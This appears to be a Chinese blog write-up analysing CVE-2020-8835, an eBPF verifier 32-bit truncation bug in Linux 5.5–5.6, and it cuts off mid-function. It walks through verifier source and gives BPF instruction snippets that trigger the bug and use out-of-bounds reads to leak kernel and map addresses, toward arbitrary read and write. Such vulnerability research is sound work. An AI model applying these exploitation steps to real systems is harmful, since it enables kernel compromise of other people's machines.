CVE-2020-8835：eBPF verifier 整数截断导致的越界读写

文章目录

前言
漏洞分析
- do_check 函数
漏洞利用
- 漏洞触发
- 越界读实现地址泄漏
- 越界写实现任意读
- 越界写实现任意写
exp 及效果演示
参考

前言

影响版本：v5.4.7 ~ v5.5.0 以及更新的版本，如 5.6
编译选项：CONFIG_BPF_SYSCALL，config 所有带 BPF 字样的编译选项
漏洞概述：该漏洞是在 commit 581738a681b6 中引入，verifier 没有正确地将64位值转换为32位（直接取低32位），使得 BPF 寄存器的值在代码验证阶段和实际执行阶段不一致，导致越界读写
测试环境：linux-5.6.0

漏洞分析

ebpf 程序在被加载到内核后，首先会模拟执行一遍以此检查 ebpf 中可能出现的错误或者恶意代码。而 verifier 会对 ebpf 进行静态检查，漏洞调用链如下：

bpf_check
	do_check_main
		do_check_common
			do_check
				check_cond_jmp_op
					reg_set_min_max

在 bpf_prog_load 中可以看到这里会执行 verifier -- bpf_check ：

static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
{
......
	/* run eBPF verifier */
	err = bpf_check(&prog, attr, uattr);
	if (err < 0)
		goto free_used_maps;
......
}

bpf_check 会调用到 do_check_main 函数：

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr,
	      union bpf_attr __user *uattr)
{
......
	ret = check_cfg(env);
	if (ret < 0)
		goto skip_full_check;

	ret = do_check_subprogs(env);
	ret = ret ?: do_check_main(env);

	if (ret == 0 && bpf_prog_is_dev_bound(env->prog->aux))
		ret = bpf_prog_offload_finalize(env);

......
}

do_check_main 主要就是调用了 do_check_common 函数：

static int do_check_main(struct bpf_verifier_env *env)
{
	int ret;

	env->insn_idx = 0;
	ret = do_check_common(env, 0);
	if (!ret)
		env->prog->aux->stack_depth = env->subprog_info[0].stack_depth;
	return ret;
}

do_check_common 最后会调用到 do_check 函数：

static int do_check_common(struct bpf_verifier_env *env, int subprog)
{
......
	ret = do_check(env);
......
}

最后的漏洞也是出现在 do_check 函数中，所以这里重点看下 do_check 函数。

do_check 函数

do_check 函数有点长，这里我还是重点看漏洞出现的执行分支：

static int do_check(struct bpf_verifier_env *env)
{
	struct bpf_verifier_state *state = env->cur_state;
	struct bpf_insn *insns = env->prog->insnsi;
	struct bpf_reg_state *regs;
	int insn_cnt = env->prog->len;
	bool do_print_state = false;
	int prev_insn_idx = -1;
	// 遍历每一条指令
	for (;;) {
		struct bpf_insn *insn;
		u8 class;
		int err;

		env->prev_insn_idx = prev_insn_idx; // 前一条指令 idx
		if (env->insn_idx >= insn_cnt) { // insn_cnt 为指令总数量
			verbose(env, "invalid insn idx %d insn_cnt %d\n", env->insn_idx, insn_cnt);
			return -EFAULT;
		}

		insn = &insns[env->insn_idx]; // 获取指令
		class = BPF_CLASS(insn->code); // 获取指令类型
		// 指令数量有限制
		if (++env->insn_processed > BPF_COMPLEXITY_LIMIT_INSNS) {
			verbose(env, "BPF program is too large. Processed %d insn\n", env->insn_processed);
			return -E2BIG;
		}
		// 该指令是否处理过
		err = is_state_visited(env, env->insn_idx);
		if (err < 0)
			return err;
		if (err == 1) {
			/* found equivalent state, can prune the search */
			if (env->log.level & BPF_LOG_LEVEL) {
					// log 相关的东西
			}
			goto process_bpf_exit;
		}

		if (signal_pending(current))
			return -EAGAIN;

		if (need_resched())
			cond_resched();
		// log 相关的东西
		if (env->log.level & BPF_LOG_LEVEL2 ||
		    (env->log.level & BPF_LOG_LEVEL && do_print_state)) {
				......
		}

		if (env->log.level & BPF_LOG_LEVEL) {
			// log 相关的东西
			......
		}

		if (bpf_prog_is_dev_bound(env->prog->aux)) {
			err = bpf_prog_offload_verify_insn(env, env->insn_idx,
							   env->prev_insn_idx);
			if (err)
				return err;
		}

		regs = cur_regs(env);
		env->insn_aux_data[env->insn_idx].seen = env->pass_cnt;
		prev_insn_idx = env->insn_idx;
		// 下面就是针对不同的指令类型进行不同的检查处理了
		// 这里我们主要关注跳转指令，这里也是漏洞分支
		if (class == BPF_ALU || class == BPF_ALU64) {
			err = check_alu_op(env, insn);
			if (err) return err;
		} else if (class == BPF_LDX) {
			enum bpf_reg_type *prev_src_type, src_reg_type;
			err = check_reg_arg(env, insn->src_reg, SRC_OP);
			if (err) return err;
			err = check_reg_arg(env, insn->dst_reg, DST_OP_NO_MARK);
			if (err) return err;
			src_reg_type = regs[insn->src_reg].type;
			err = check_mem_access(env, env->insn_idx, insn->src_reg,
					       insn->off, BPF_SIZE(insn->code),
					       BPF_READ, insn->dst_reg, false);
			......
		} else if (class == BPF_STX) {
			enum bpf_reg_type *prev_dst_type, dst_reg_type;

			if (BPF_MODE(insn->code) == BPF_XADD) {
				err = check_xadd(env, env->insn_idx, insn);
				if (err) return err;
				env->insn_idx++;
				continue;
			}

			/* check src1 operand */
			err = check_reg_arg(env, insn->src_reg, SRC_OP);
			if (err) return err;
			/* check src2 operand */
			err = check_reg_arg(env, insn->dst_reg, SRC_OP);
			if (err) return err;
			dst_reg_type = regs[insn->dst_reg].type;
			/* check that memory (dst_reg + off) is writeable */
			err = check_mem_access(env, env->insn_idx, insn->dst_reg,
					       insn->off, BPF_SIZE(insn->code),
					       BPF_WRITE, insn->src_reg, false);
			......

		} else if (class == BPF_ST) {
				......
		} else if (class == BPF_JMP || class == BPF_JMP32) {
			// 针对跳转指令的处理，有 32 位跳转和 64 位跳转
			u8 opcode = BPF_OP(insn->code);
			env->jmps_processed++;
			if (opcode == BPF_CALL) {
				// call 指令
				......
			} else if (opcode == BPF_JA) {
				// ja 指令
				......
			} else if (opcode == BPF_EXIT) {
				// exit 指令
				......
process_bpf_exit:
				......
			} else {
				// 条件跳转指令
				err = check_cond_jmp_op(env, insn, &env->insn_idx);
				if (err) return err;
			}
		} else if (class == BPF_LD) {
			......
		} else {
			verbose(env, "unknown insn class %d\n", class);
			return -EINVAL;
		}

		env->insn_idx++;
	}
	return 0;
}

条件跳转指令会由 check_cond_jmp_op 函数进行处理：

static int check_cond_jmp_op(struct bpf_verifier_env *env,
			     struct bpf_insn *insn, int *insn_idx)
{
	struct bpf_verifier_state *this_branch = env->cur_state;
	struct bpf_verifier_state *other_branch;
	struct bpf_reg_state *regs = this_branch->frame[this_branch->curframe]->regs;
	struct bpf_reg_state *dst_reg, *other_branch_regs, *src_reg = NULL;
	u8 opcode = BPF_OP(insn->code);
	bool is_jmp32;
	int pred = -1;
	int err;

	/* Only conditional jumps are expected to reach here. */
	// 检查是否是 >条件分支跳转<
	if (opcode == BPF_JA || opcode > BPF_JSLE) {
		verbose(env, "invalid BPF_JMP/JMP32 opcode %x\n", opcode);
		return -EINVAL;
	}
	// 操作数是寄存器
	if (BPF_SRC(insn->code) == BPF_X) {
		if (insn->imm != 0) {
			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
			return -EINVAL;
		}

		/* check src1 operand */
		err = check_reg_arg(env, insn->src_reg, SRC_OP);
		if (err) return err;

		if (is_pointer_value(env, insn->src_reg)) {
			verbose(env, "R%d pointer comparison prohibited\n", insn->src_reg);
			return -EACCES;
		}
		src_reg = &regs[insn->src_reg];
	// 操作数是立即数
	} else {
		// src_reg 必须是 0
		if (insn->src_reg != BPF_REG_0) {
			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
			return -EINVAL;
		}
	}

	/* check src2 operand */
	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
	if (err) return err;
	// 获取目的寄存器 dst_reg
	dst_reg = &regs[insn->dst_reg];
	// 是否 jmp32
	is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
	// is_branch_taken 主要就是检查分支是否可以预测
	// 比如这里是立即数跳转：dst_reg 寄存器的 umin = 1, umax = 7，而 imm = 0
	// 那么对于 jle dst_reg imm off 而言：dst_reg.umin > imm，所以这里可以肯定不会跳转
	// 所以为了使得 pred = -1，就得让 dst_reg 为 uknown
	// 这里可以从 map 中加载数据到 dst_reg 中使得 dst_reg 为 unknown
	if (BPF_SRC(insn->code) == BPF_K)
		pred = is_branch_taken(dst_reg, insn->imm, opcode, is_jmp32);
	else if (src_reg->type == SCALAR_VALUE && tnum_is_const(src_reg->var_off))
		pred = is_branch_taken(dst_reg, src_reg->var_off.value, opcode, is_jmp32);
	if (pred >= 0) {
		err = mark_chain_precision(env, insn->dst_reg);
		if (BPF_SRC(insn->code) == BPF_X && !err)
			err = mark_chain_precision(env, insn->src_reg);
		if (err) return err;
	}
	// 可以看到这里的 if-else pred = 0/1 都会直接返回
	// 为了使得向下执行，得让 pred = -1，即寄存器为 unknown
	if (pred == 1) {
		/* only follow the goto, ignore fall-through */
		*insn_idx += insn->off;
		return 0;
	} else if (pred == 0) {
		/* only follow fall-through branch, since
		 * that's where the program will go
		 */
		return 0;
	}
	// 保存另一个分支
	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx, false);
	if (!other_branch)
		return -EFAULT;
	// 获取另一个分支寄存器的状态
	other_branch_regs = other_branch->frame[other_branch->curframe]->regs;

	/* detect if we are comparing against a constant value so we can adjust
	 * our min/max values for our dst register.
	 * this is only legit if both are scalars (or pointers to the same
	 * object, I suppose, but we don't support that right now), because
	 * otherwise the different base pointers mean the offsets aren't
	 * comparable.
	 */
	// 操作数是寄存器
	if (BPF_SRC(insn->code) == BPF_X) {
		struct bpf_reg_state *src_reg = &regs[insn->src_reg];
		struct bpf_reg_state lo_reg0 = *dst_reg;
		struct bpf_reg_state lo_reg1 = *src_reg;
		struct bpf_reg_state *src_lo, *dst_lo;

		dst_lo = &lo_reg0;
		src_lo = &lo_reg1;
		coerce_reg_to_size(dst_lo, 4);
		coerce_reg_to_size(src_lo, 4);

		if (dst_reg->type == SCALAR_VALUE &&
		    src_reg->type == SCALAR_VALUE) {
			if (tnum_is_const(src_reg->var_off) ||
			    (is_jmp32 && tnum_is_const(src_lo->var_off)))
				reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg,
						is_jmp32
						? src_lo->var_off.value
						: src_reg->var_off.value,
						opcode, is_jmp32);
			else if (tnum_is_const(dst_reg->var_off) ||
				 (is_jmp32 && tnum_is_const(dst_lo->var_off)))
				reg_set_min_max_inv(&other_branch_regs[insn->src_reg],
						    src_reg,
						    is_jmp32
						    ? dst_lo->var_off.value
						    : dst_reg->var_off.value,
						    opcode, is_jmp32);
			else if (!is_jmp32 &&
				 (opcode == BPF_JEQ || opcode == BPF_JNE))
				/* Comparing for equality, we can combine knowledge */
				reg_combine_min_max(&other_branch_regs[insn->src_reg],
						    &other_branch_regs[insn->dst_reg],
						    src_reg, dst_reg, opcode);
		}
	} else if (dst_reg->type == SCALAR_VALUE) {
	// 操作数是立即数，这里是直接调用了 reg_set_min_max 进行处理
		reg_set_min_max(&other_branch_regs[insn->dst_reg], dst_reg, insn->imm, opcode, is_jmp32);
	}

	/* detect if R == 0 where R is returned from bpf_map_lookup_elem().
	 * NOTE: these optimizations below are related with pointer comparison
	 *       which will never be JMP32.
	 */
	if (!is_jmp32 && BPF_SRC(insn->code) == BPF_K &&
	    insn->imm == 0 && (opcode == BPF_JEQ || opcode == BPF_JNE) &&
	    reg_type_may_be_null(dst_reg->type)) {
		/* Mark all identical registers in each branch as either
		 * safe or unknown depending R == 0 or R != 0 conditional.
		 */
		mark_ptr_or_null_regs(this_branch, insn->dst_reg, opcode == BPF_JNE);
		mark_ptr_or_null_regs(other_branch, insn->dst_reg, opcode == BPF_JEQ);
	} else if (!try_match_pkt_pointers(insn, dst_reg, &regs[insn->src_reg], this_branch, other_branch) & is_pointer_value(env, insn->dst_reg)) {
		verbose(env, "R%d pointer comparison prohibited\n", insn->dst_reg);
		return -EACCES;
	}
	if (env->log.level & BPF_LOG_LEVEL)
		print_verifier_state(env, this_branch->frame[this_branch->curframe]);
	return 0;
}

可以看到针对立即数条件跳转指令，调用了 reg_set_min_max 进行处理：

这里得说明一下，这里的 true_reg 其实就是 dst_reg，通过调试可以验证

/* Adjusts the register min/max values in the case that the dst_reg is the
 * variable register that we are working on, and src_reg is a constant or we're
 * simply doing a BPF_K check.
 * In JEQ/JNE cases we also adjust the var_off values.
 */
static void reg_set_min_max(struct bpf_reg_state *true_reg,
			    struct bpf_reg_state *false_reg, u64 val,
			    u8 opcode, bool is_jmp32)
{
	s64 sval;

	/* If the dst_reg is a pointer, we can't learn anything about its
	 * variable offset from the compare (unless src_reg were a pointer into
	 * the same object, but we don't bother with that.
	 * Since false_reg and true_reg have the same type by construction, we
	 * only need to check one of them for pointerness.
	 */
	if (__is_pointer_value(false, false_reg))
		return;

	val = is_jmp32 ? (u32)val : val;
	sval = is_jmp32 ? (s64)(s32)val : (s64)val;

	switch (opcode) {
	case BPF_JEQ:
	case BPF_JNE:
	{
		struct bpf_reg_state *reg = opcode == BPF_JEQ ? true_reg : false_reg;

		/* For BPF_JEQ, if this is false we know nothing Jon Snow, but
		 * if it is true we know the value for sure. Likewise for
		 * BPF_JNE.
		 */
		if (is_jmp32) {
			u64 old_v = reg->var_off.value;
			u64 hi_mask = ~0xffffffffULL;

			reg->var_off.value = (old_v & hi_mask) | val;
			reg->var_off.mask &= hi_mask;
		} else {
			__mark_reg_known(reg, val);
		}
		break;
	}
	case BPF_JSET:
		false_reg->var_off = tnum_and(false_reg->var_off, tnum_const(~val));
		if (is_power_of_2(val))
			true_reg->var_off = tnum_or(true_reg->var_off, tnum_const(val));
		break;
	case BPF_JGE:
	case BPF_JGT:
	{
		// BPF_JGE change true_reg.umin_value
		u64 false_umax = opcode == BPF_JGT ? val    : val - 1;
		u64 true_umin = opcode == BPF_JGT ? val + 1 : val;

		if (is_jmp32) {
			false_umax += gen_hi_max(false_reg->var_off);
			true_umin += gen_hi_min(true_reg->var_off);
		}
		false_reg->umax_value = min(false_reg->umax_value, false_umax);
		true_reg->umin_value = max(true_reg->umin_value, true_umin);
		break;
	}
	case BPF_JSGE:
	case BPF_JSGT:
	{
		s64 false_smax = opcode == BPF_JSGT ? sval    : sval - 1;
		s64 true_smin = opcode == BPF_JSGT ? sval + 1 : sval;

		/* If the full s64 was not sign-extended from s32 then don't
		 * deduct further info.
		 */
		if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
			break;
		false_reg->smax_value = min(false_reg->smax_value, false_smax);
		true_reg->smin_value = max(true_reg->smin_value, true_smin);
		break;
	}
	case BPF_JLE:
	case BPF_JLT:
	{
		u64 false_umin = opcode == BPF_JLT ? val    : val + 1;
		u64 true_umax = opcode == BPF_JLT ? val - 1 : val;

		if (is_jmp32) {
			false_umin += gen_hi_min(false_reg->var_off);
			true_umax += gen_hi_max(true_reg->var_off);
		}
		false_reg->umin_value = max(false_reg->umin_value, false_umin);
		true_reg->umax_value = min(true_reg->umax_value, true_umax);
		break;
	}
	case BPF_JSLE:
	case BPF_JSLT:
	{
		s64 false_smin = opcode == BPF_JSLT ? sval    : sval + 1;
		s64 true_smax = opcode == BPF_JSLT ? sval - 1 : sval;

		if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
			break;
		false_reg->smin_value = max(false_reg->smin_value, false_smin);
		true_reg->smax_value = min(true_reg->smax_value, true_smax);
		break;
	}
	default:
		break;
	}

	__reg_deduce_bounds(false_reg);
	__reg_deduce_bounds(true_reg);
	/* We might have learned some bits from the bounds. */
	__reg_bound_offset(false_reg);
	__reg_bound_offset(true_reg);
	if (is_jmp32) {
		__reg_bound_offset32(false_reg);
		__reg_bound_offset32(true_reg);
	}
	/* Intersecting with the old var_off might have improved our bounds
	 * slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
	 * then new var_off is (0; 0x7f...fc) which improves our umax.
	 */
	__update_reg_bounds(false_reg);
	__update_reg_bounds(true_reg);
}

主要来看下 __reg_bound_offset32 函数：

// Build a tnum (value/mask pair) from the bounds [min, max].
// Worked example for the bug: the real bounds are min = 1, max = 0x1 0000 0001,
// but the caller passes min & mask = 1, max & mask = 1 (low 32 bits only).
struct tnum tnum_range(u64 min, u64 max)
{
	// chi = min ^ max = 0 for the example above
	u64 chi = min ^ max, delta;
	// fls64() returns the 1-based position of the most significant set bit
	// (0 when no bit is set), e.g. 5 = (101)2 ==> fls64(5) = 3
	// bits = fls64(chi) = 0 for the example above
	u8 bits = fls64(chi);

	/* special case, needed because 1ULL << 64 is undefined */
	if (bits > 63)
		return tnum_unknown;
	/* e.g. if chi = 4, bits = 3, delta = (1<<3) - 1 = 7.
	 * if chi = 0, bits = 0, delta = (1<<0) - 1 = 0, so we return
	 *  constant min (since min == max).
	 */
	// delta = (1ULL << 0) - 1 = 0 for the example above
	delta = (1ULL << bits) - 1;
	// result for the example: { value = 1, mask = 0 }, i.e. the constant 1
	return TNUM(min & ~delta, delta);
}

// Refine reg->var_off from the register's unsigned bounds after a JMP32
// comparison. The bounds are truncated to their low 32 bits before being
// turned into a range, which is the root cause discussed in this article.
static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
	// The arguments handed to tnum_range() simply drop the high 32 bits
	u64 mask = 0xffffFFFF;
	// Example: umin_value = 1, umax_value = 0x1 0000 0001
	// ==> tnum_range(1, 1), so range = { value = 1, mask = 0 }
	struct tnum range = tnum_range(reg->umin_value & mask, reg->umax_value & mask);
	// Low 32 bits of var_off
	struct tnum lo32 = tnum_cast(reg->var_off, 4);
	// High 32 bits of var_off (low 32 bits cleared)
	struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);
/* Helper definitions reproduced here for reference:
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;
	mu = a.mask & b.mask;
	return TNUM(v & ~mu, mu);
}

struct tnum tnum_or(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;
	mu = a.mask | b.mask;
	return TNUM(v, mu & ~v);
}
*/
	// tnum_intersect(lo32, range) ==> { value = lo32.value | 1, mask = 0 }
	// tnum_or(hi32, <that result>) ==>
	//     { value = hi32.value | lo32.value | 1, mask = hi32.mask & ~value }
	// Net effect on reg->var_off for the example:
	//     low 32 bits:  mask = 0, value = lo32.value | 1 (treated as fully known)
	//     high 32 bits: mask and value are taken from hi32
	reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}

这里请看注释漏洞很明显了，这里对于一个寄存器 dst_reg，其 umin = 1, umax = 0x1 0000 0001，再经过 __reg_bound_offset32 处理后，其 var_off 被设置了 { value = 0xXXXX XXXX 0000 0001, mask = 0xXXXX XXXX 0000 0000 } ，即这里的低 32 位是确定了的。

所以问题就来了，这里的 dst_reg 不一定就是确定的，正如上文所说，我们可以从 map 中加载值到 dst_reg 中，所以此时 dst_reg 的值是可变的；但经过 __reg_bound_offset32 处理后，其低 32 位却被 verifier 当成了一个确定的值。

漏洞利用

漏洞触发

注意事项：

想要执行到 reg_set_min_max 路径，必须绕过 is_branch_taken，即 dst_reg 应该是不确定的
要让 dst_reg.umin = 1, dst_reg.umax = 0x1 0000 0001

问题1解决方案
加载 map 的值到 dst_reg 中：
在这里插入图片描述
可以看到 dst_reg = reg6 的 var_off 是 unknown 的，其可以执行到 reg_set_min_max：

问题2解决方案
这里得重新回到 reg_set_min_max 函数：

static void reg_set_min_max(struct bpf_reg_state *true_reg,
			    struct bpf_reg_state *false_reg, u64 val,
			    u8 opcode, bool is_jmp32)
{
	s64 sval;
	if (__is_pointer_value(false, false_reg))
		return;

	val = is_jmp32 ? (u32)val : val;
	sval = is_jmp32 ? (s64)(s32)val : (s64)val;

	switch (opcode) {
	case BPF_JEQ:
	case BPF_JNE:
......
	case BPF_JSET:
......
	case BPF_JGE:
	case BPF_JGT:
	{
		// BPF_JGE change true_reg.umin_value
		u64 false_umax = opcode == BPF_JGT ? val    : val - 1;
		u64 true_umin = opcode == BPF_JGT ? val + 1 : val;

		if (is_jmp32) {
			false_umax += gen_hi_max(false_reg->var_off);
			true_umin += gen_hi_min(true_reg->var_off);
		}
		false_reg->umax_value = min(false_reg->umax_value, false_umax);
		true_reg->umin_value = max(true_reg->umin_value, true_umin);
		break;
	}
	case BPF_JSGE:
	case BPF_JSGT:
......
	case BPF_JLE:
	case BPF_JLT:
	{
		u64 false_umin = opcode == BPF_JLT ? val    : val + 1;
		u64 true_umax = opcode == BPF_JLT ? val - 1 : val;

		if (is_jmp32) {
			false_umin += gen_hi_min(false_reg->var_off);
			true_umax += gen_hi_max(true_reg->var_off);
		}
		false_reg->umin_value = max(false_reg->umin_value, false_umin);
		true_reg->umax_value = min(true_reg->umax_value, true_umax);
		break;
	}
	case BPF_JSLE:
	case BPF_JSLT:
......
	default:
		break;
	}

	__reg_deduce_bounds(false_reg);
	__reg_deduce_bounds(true_reg);
	/* We might have learned some bits from the bounds. */
	__reg_bound_offset(false_reg);
	__reg_bound_offset(true_reg);
	if (is_jmp32) {
		__reg_bound_offset32(false_reg);
		__reg_bound_offset32(true_reg);
	}
	__update_reg_bounds(false_reg);
	__update_reg_bounds(true_reg);
}

看到这里的第 1/2 个参数，分别是 true_reg 和 false_reg，我们将断点打在这个函数这里，然后查看其参数：
在这里插入图片描述
可以发现这里的 true_reg 就是 dst_reg，所以我们可以在 reg_set_min_max 函数中利用 BPF_JGE 和 BPF_JLE 修改 dst_reg 的 umin/umax

1、修改 dst_reg.umin = 1
这里很简单，在 reg_set_min_max 中，可以看到：

	case BPF_JGE:
	case BPF_JGT:
	{
		// BPF_JGE change true_reg.umin_value
		// val = insn->imm = imm
		u64 false_umax = opcode == BPF_JGT ? val    : val - 1;
		u64 true_umin = opcode == BPF_JGT ? val + 1 : val;

		if (is_jmp32) {
			false_umax += gen_hi_max(false_reg->var_off);
			true_umin += gen_hi_min(true_reg->var_off);
		}
		false_reg->umax_value = min(false_reg->umax_value, false_umax);
		true_reg->umin_value = max(true_reg->umin_value, true_umin);
		break;
	}

所以我们可以通过如下指令去设置 dst_reg.umin = 1：这里的 dst_reg 为 reg6

BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1)

执行完后，可以看到 umin 成功被修改为 1：
在这里插入图片描述
2、修改 dst_reg.umax = 0x1 0000 0001
这里如果我们参考修改 umin 的话，你会发现一个问题，即这里的 val = 0x1 0000 0001，而 imm 是 int 类型，所以这里是无法直接利用立即数条件跳转的

所以这里还是得回到 check_cond_jmp_op 函数：

if (BPF_SRC(insn->code) == BPF_X) {
		struct bpf_reg_state *src_reg = &regs[insn->src_reg];
		struct bpf_reg_state lo_reg0 = *dst_reg;
		struct bpf_reg_state lo_reg1 = *src_reg;
		struct bpf_reg_state *src_lo, *dst_lo;

		dst_lo = &lo_reg0;
		src_lo = &lo_reg1;
		coerce_reg_to_size(dst_lo, 4);
		coerce_reg_to_size(src_lo, 4);

		if (dst_reg->type == SCALAR_VALUE &&
		    src_reg->type == SCALAR_VALUE) {
			if (tnum_is_const(src_reg->var_off) ||
			    (is_jmp32 && tnum_is_const(src_lo->var_off)))
				reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg,
						is_jmp32
						? src_lo->var_off.value
						: src_reg->var_off.value,
						opcode, is_jmp32);
			else if (tnum_is_const(dst_reg->var_off) ||
				 (is_jmp32 && tnum_is_const(dst_lo->var_off)))
				......
			else if (!is_jmp32 &&
				 (opcode == BPF_JEQ || opcode == BPF_JNE))
				......
		}
	} else if (dst_reg->type == SCALAR_VALUE) {
		reg_set_min_max(&other_branch_regs[insn->dst_reg],
					dst_reg, insn->imm, opcode, is_jmp32);
	}

可以看到这里针对寄存器条件跳转的处理，当 src_reg->var_off 是一个确定的值时，其会调用：

reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg,
						is_jmp32
						? src_lo->var_off.value
						: src_reg->var_off.value,
						opcode, is_jmp32);

这里我们如果执行 64 位跳转，则执行函数如下：

reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg, src_reg->var_off.value, opcode, is_jmp32);

然后就和立即数条件跳转类似了，不同的是，立即数条件跳转 val 传入的是 imm（int 类型，只有 32 位），而这里 val 传入的是 src_reg->var_off.value，它是 64 位的。

通过以下代码修改 umax：

BPF_MOV64_IMM(BPF_REG_8, 1), 
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), 
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1), 
BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1),

可能这里读者会疑惑：为什么不直接用一条 BPF_MOV64_IMM 设置 src_reg = r8 = 0x1 0000 0001 呢？因为 imm 为 int 类型，放不下超过 32 位的值

调试跟踪：
在这里插入图片描述
执行 JLE 处理后：

漏洞触发
漏洞触发比较简单，使用 JMP32 即可，同样 dst_reg 要求 unknown：

BPF_JMP32_IMM(BPF_JNE, BPF_REG_6, 5, 1),

效果如下：
在这里插入图片描述
可以看到 dst_reg 只有第 32 位不确定，其它位都是确定的。这里为了消除第 32 位的影响，我们使用 AND 操作：

BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2),
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1),

这里 r6 & 2，虽然 r6 的第 32 位是不确定的，但是 2 的第 32 位为 0，所以不管 r6 的第 32 位是 1 还是 0，这里 r6 & 2 的结果都是 0，然后再 r6 >> 1 也是恒为 0 了：
在这里插入图片描述
但是这里是存在问题的，因为 r6 的值是从 map 中加载的，所以这里我们可以设置 r6 = 2，所以真实的情况是：r6 & 2 = 2 & 2 = 2，然后 r6 >>1 = 2 >> 1 = 1。所以实际运行时 r6 = 1 而不是 r6 = 0。

越界读实现地址泄漏

这里主要通过越界读泄漏 kernel base 和 map_addr

这里借助 ebpf 的一个助手函数 bpf_map_lookup_elem_proto

BPF_CALL_2(bpf_map_lookup_elem, struct bpf_map *, map, void *, key)
{
	WARN_ON_ONCE(!rcu_read_lock_held());
	return (unsigned long) map->ops->map_lookup_elem(map, key);
}

const struct bpf_func_proto bpf_map_lookup_elem_proto = {
	.func		= bpf_map_lookup_elem,
	.gpl_only	= false,
	.pkt_access	= true,
	.ret_type	= RET_PTR_TO_MAP_VALUE_OR_NULL,
	.arg1_type	= ARG_CONST_MAP_PTR,
	.arg2_type	= ARG_PTR_TO_MAP_KEY,
};

可以看到 bpf_map_lookup_elem 函数直接调用了 map->ops->map_lookup_elem(map, key)，struct bpf_map 定义如下：
在这里插入图片描述
可以看到其第一个域为一个 bpf_map_ops，这里我们创建的是 array map，所以 bpf_map_ops 为 array_map_ops：

const struct bpf_map_ops array_map_ops = {
	.map_alloc_check = array_map_alloc_check,
	.map_alloc = array_map_alloc,
	.map_free = array_map_free,
	.map_get_next_key = array_map_get_next_key,
	.map_lookup_elem = array_map_lookup_elem,
	.map_update_elem = array_map_update_elem,
	.map_delete_elem = array_map_delete_elem,
	.map_gen_lookup = array_map_gen_lookup,
	.map_direct_value_addr = array_map_direct_value_addr,
	.map_direct_value_meta = array_map_direct_value_meta,
	.map_mmap = array_map_mmap,
	.map_seq_show_elem = array_map_seq_show_elem,
	.map_check_btf = array_map_check_btf,
};

所以 map->ops->map_lookup_elem 就是 array_map_lookup_elem 函数：

static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = *(u32 *)key;

	if (unlikely(index >= array->map.max_entries))
		return NULL;

	return array->value + array->elem_size * (index & array->index_mask);
}

可以看到 map [struct bpf_map] 其实是 array [struct bpf_array] 的一个成员，struct bpf_array 定义如下：
在这里插入图片描述
有趣的来啦，array_map_lookup_elem 读取的 value 域在 map 的下方，所以这里通过越界读取是可以直接读取 map 中的内容的，所以这里就可以直接读取 map.bpf_map_ops 去泄漏内核基地址了。而 value 的起始地址相对 map 起始地址为 0x110，所以可以通过如下指令进行越界读取：

BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),

经过上面的分析我们知道，在验证阶段 r6 = 0，所以 r6*0x110 = 0，而实际运行时 r6 = 1，所以 r6*0x110=0x110。这时候如果我们读取 value[-r6] 是可以通过验证的，因为验证阶段当作了 value[-0] = value[0]，但是在实际运行时读取的是 value[-0x110]，从而直接泄漏 bpf_map_ops

那现在如何泄漏 map_addr 地址呢【这里泄漏 map_addr 主要是为后面任意写做准备的】？在 bpf_map 中，保存着自己的地址：
在这里插入图片描述
所以我们也可以通过越界读取直接泄漏 map_addr

越界写实现任意读

BPF Type Format（BTF）是一种元数据格式，用于给 eBPF 提供一些额外的信息，在内核中使用 btf 结构体表示一条 btf 信息：

struct btf {
	void *data;
	struct btf_type **types;
	u32 *resolved_ids;
	u32 *resolved_sizes;
	const char *strings;
	void *nohdr_data;
	struct btf_header hdr;
	u32 nr_types; /* includes VOID for base BTF */
	u32 types_size;
	u32 data_size;
	refcount_t refcnt;
	u32 id;
	struct rcu_head rcu;

	/* split BTF support */
	struct btf *base_btf;
	u32 start_id; /* first type ID in this BTF (0 for base BTF) */
	u32 start_str_off; /* first string offset (0 for base BTF) */
	char name[MODULE_NAME_LEN];
	bool kernel_btf;
};

注意到在 bpf_map 当中刚好有一个指向 struct btf 的指针：
在这里插入图片描述
bpf_map->btf 在什么时候会被访问到？注意到 bpf 系统调用给我们提供的选项中有一个为 BPF_OBJ_GET_INFO_BY_FD：

SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
	//...

	switch (cmd) {
	//...
	case BPF_OBJ_GET_INFO_BY_FD:
		err = bpf_obj_get_info_by_fd(&attr, uattr);
		break;

对于 map 类型而言最终会调用到 bpf_map_get_info_by_fd() ，在该函数中会把 bpf_map->btf->id 拷贝给用户空间：

static int bpf_map_get_info_by_fd(struct file *file,
				  struct bpf_map *map,
				  const union bpf_attr *attr,
				  union bpf_attr __user *uattr)
{
	//...

	if (map->btf) {
		info.btf_id = btf_obj_id(map->btf);
		info.btf_key_type_id = map->btf_key_type_id;
